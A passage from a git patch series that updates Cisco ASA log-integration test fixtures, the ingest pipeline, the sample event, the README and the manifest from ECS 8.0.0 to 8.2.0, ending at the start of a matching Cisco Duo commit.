+ "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -14250,7 +14250,7 @@ "port": 1295 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -14334,7 +14334,7 @@ "port": 1296 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -14417,7 +14417,7 @@ "port": 8301 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -14499,7 +14499,7 @@ "port": 1297 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -14577,7 +14577,7 @@ "port": 8302 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -14659,7 +14659,7 @@ "port": 1298 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -14742,7 +14742,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -14821,7 +14821,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -14904,7 +14904,7 @@ "port": 1297 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -14987,7 +14987,7 @@ "port": 8303 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -15069,7 +15069,7 @@ "port": 1299 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -15147,7 +15147,7 @@ "port": 8304 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -15229,7 +15229,7 @@ "port": 1300 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -15308,7 +15308,7 @@ "port": 1298 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -15392,7 +15392,7 @@ "port": 1300 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -15475,7 +15475,7 @@ "port": 8305 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -15557,7 +15557,7 @@ "port": 1301 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -15635,7 +15635,7 @@ "port": 8306 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -15717,7 +15717,7 @@ "port": 1302 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -15787,7 +15787,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -15833,7 +15833,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -15879,7 +15879,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -15925,7 +15925,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -15971,7 +15971,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -16017,7 +16017,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -16063,7 +16063,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -16109,7 +16109,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -16155,7 +16155,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -16201,7 +16201,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -16247,7 +16247,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -16293,7 +16293,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -16339,7 +16339,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -16385,7 +16385,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -16431,7 +16431,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -16485,7 +16485,7 @@ "port": 8308 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -16567,7 +16567,7 @@ "port": 1304 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -16637,7 +16637,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -16683,7 +16683,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -16742,7 +16742,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -16825,7 +16825,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -16904,7 +16904,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -16987,7 +16987,7 @@ "port": 56132 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -17069,7 +17069,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -17151,7 +17151,7 @@ "port": 1305 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -17221,7 +17221,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -17267,7 +17267,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -17313,7 +17313,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -17359,7 +17359,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -17405,7 +17405,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -17451,7 +17451,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -17497,7 +17497,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -17552,7 +17552,7 @@ "port": 1305 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -17636,7 +17636,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -17716,7 +17716,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -17796,7 +17796,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -17875,7 +17875,7 @@ "port": 8310 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -17957,7 +17957,7 @@ "port": 1306 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -18036,7 +18036,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -18116,7 +18116,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -18196,7 +18196,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -18276,7 +18276,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -18356,7 +18356,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -18436,7 +18436,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -18516,7 +18516,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -18596,7 +18596,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -18676,7 +18676,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -18756,7 +18756,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -18836,7 +18836,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -18916,7 +18916,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -18996,7 +18996,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -19076,7 +19076,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -19156,7 +19156,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -19236,7 +19236,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -19316,7 +19316,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -19396,7 +19396,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -19476,7 +19476,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -19556,7 +19556,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -19636,7 +19636,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -19716,7 +19716,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -19796,7 +19796,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -19876,7 +19876,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -19956,7 +19956,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -20036,7 +20036,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -20116,7 +20116,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -20196,7 +20196,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -20276,7 +20276,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -20356,7 +20356,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -20436,7 +20436,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -20516,7 +20516,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -20596,7 +20596,7 @@ "port": 8309 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json index 9bafdea0fef..238a4358f76 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-dap-records.log-expected.json @@ -12,7 +12,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json index d6d086becf4..f8b630f2bd3 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json @@ -6,7 +6,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -52,7 +52,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -102,7 +102,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json index db6772d1dcb..3e189d3d992 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-hostnames.log-expected.json @@ -11,7 +11,7 @@ "domain": "target.destination.hostname.local" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -77,7 +77,7 @@ "ip": "192.168.2.15" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json index 2e7240675dc..ee56351f3c9 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json @@ -27,7 +27,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -100,7 +100,7 @@ "ip": "172.24.177.29" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -171,7 +171,7 @@ "port": 80 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json index 1c6c150d809..31e59b1112c 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json @@ -15,7 +15,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -84,7 +84,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -154,7 +154,7 @@ "port": 2000 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -223,7 +223,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -299,7 +299,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -374,7 +374,7 @@ "port": 12834 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -448,7 +448,7 @@ "port": 4952 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -515,7 +515,7 @@ "port": 25882 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -589,7 +589,7 @@ "port": 52925 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -660,7 +660,7 @@ "port": 45392 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -735,7 +735,7 @@ "port": 4953 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -804,7 +804,7 @@ "port": 52925 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -878,7 +878,7 @@ "port": 52925 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -947,7 +947,7 @@ "ip": "172.24.177.29" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -1010,7 +1010,7 @@ "port": 10879 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1085,7 +1085,7 @@ "port": 4954 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1150,7 +1150,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1211,7 +1211,7 @@ "port": 2000 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1280,7 +1280,7 @@ "port": 40443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1349,7 +1349,7 @@ "port": 40443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1418,7 +1418,7 @@ "port": 40443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1487,7 +1487,7 @@ "port": 40443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1556,7 +1556,7 @@ "port": 40443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1625,7 +1625,7 @@ "port": 40443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1694,7 +1694,7 @@ "port": 2000 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1763,7 +1763,7 @@ "port": 25 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1832,7 +1832,7 @@ "port": 2000 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1899,7 +1899,7 @@ "port": 137 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -1960,7 +1960,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2021,7 +2021,7 @@ "port": 2000 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2090,7 +2090,7 @@ "port": 40443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2159,7 +2159,7 @@ "port": 2000 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2228,7 +2228,7 @@ "port": 2000 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2297,7 +2297,7 @@ "port": 2000 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2366,7 +2366,7 @@ "port": 8111 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2435,7 +2435,7 @@ "port": 8111 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2504,7 +2504,7 @@ "port": 40443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2573,7 +2573,7 @@ "port": 2000 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2643,7 +2643,7 @@ "port": 2000 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2716,7 +2716,7 @@ "port": 80 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2787,7 +2787,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2859,7 +2859,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2935,7 +2935,7 @@ "port": 5678 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3012,7 +3012,7 @@ "port": 5678 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3085,7 +3085,7 @@ "port": 5678 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3161,7 +3161,7 @@ "port": 5678 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3237,7 +3237,7 @@ "port": 5678 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3311,7 +3311,7 @@ "port": 5679 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3376,7 +3376,7 @@ "port": 5679 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3443,7 +3443,7 @@ "port": 5000 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3519,7 +3519,7 @@ "port": 65000 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3594,7 +3594,7 @@ "port": 65000 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3665,7 +3665,7 @@ "port": 1235 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3741,7 +3741,7 @@ "port": 500 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3810,7 +3810,7 @@ "ip": "192.168.99.47" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3873,7 +3873,7 @@ "ip": "192.168.99.57" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3936,7 +3936,7 @@ "ip": "192.168.99.47" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3999,7 +3999,7 @@ "ip": "192.168.99.47" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4062,7 +4062,7 @@ "ip": "192.168.99.57" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4125,7 +4125,7 @@ "ip": "192.168.99.57" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4188,7 +4188,7 @@ "ip": "192.168.1.255" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4251,7 +4251,7 @@ "ip": "192.168.1.255" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4317,7 +4317,7 @@ "port": 25 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4388,7 +4388,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4455,7 +4455,7 @@ "ip": "172.16.1.10" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4523,7 +4523,7 @@ "port": 80 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4609,7 +4609,7 @@ "port": 80 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4687,7 +4687,7 @@ "port": 80 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4755,7 +4755,7 @@ "ip": "192.168.2.1" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4808,7 +4808,7 @@ "ip": "192.168.2.32" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4865,7 +4865,7 @@ "ip": "192.168.0.19" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4951,7 +4951,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json index a38ed339fef..70d28ebd0dd 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json @@ -16,7 +16,7 @@ "port": 5060 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -83,7 +83,7 @@ "port": 5060 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -150,7 +150,7 @@ "port": 5060 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -217,7 +217,7 @@ "port": 5060 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_asa/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 86cf3aff593..41434fe1725 100644 --- a/packages/cisco_asa/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_asa/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -7,7 +7,7 @@ processors: ignore_missing: true - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' # # Parse the syslog header # diff --git a/packages/cisco_asa/data_stream/log/sample_event.json b/packages/cisco_asa/data_stream/log/sample_event.json index d3d84d26370..ce22227bf8d 100644 --- a/packages/cisco_asa/data_stream/log/sample_event.json +++ b/packages/cisco_asa/data_stream/log/sample_event.json @@ -24,7 +24,7 @@ "port": 8256 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", diff --git a/packages/cisco_asa/docs/README.md b/packages/cisco_asa/docs/README.md index 13b50165510..ad91ac6ea0c 100644 --- a/packages/cisco_asa/docs/README.md +++ b/packages/cisco_asa/docs/README.md @@ -40,7 +40,7 @@ An example event for `log` looks as following: "port": 8256 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", diff --git a/packages/cisco_asa/manifest.yml b/packages/cisco_asa/manifest.yml index 89b78621844..05e08a7011a 100644 --- a/packages/cisco_asa/manifest.yml +++ b/packages/cisco_asa/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_asa title: Cisco ASA -version: 2.1.0 +version: 2.2.0 license: basic description: Collect logs from Cisco ASA with Elastic Agent. type: integration From ecc1bf2c109e6ebd3cca7b0d9a8c07f7246be978 Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Tue, 22 Feb 2022 15:06:18 -0600 Subject: [PATCH 11/23] Update cisco_duo to ECS 8.2 --- packages/cisco_duo/_dev/build/build.yml | 2 +- packages/cisco_duo/changelog.yml | 5 +++++ .../test/pipeline/test-admin.log-expected.json | 16 ++++++++-------- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/admin/sample_event.json | 2 +- .../test/pipeline/test-auth.log-expected.json | 10 +++++----- .../elasticsearch/ingest_pipeline/default.yml | 2 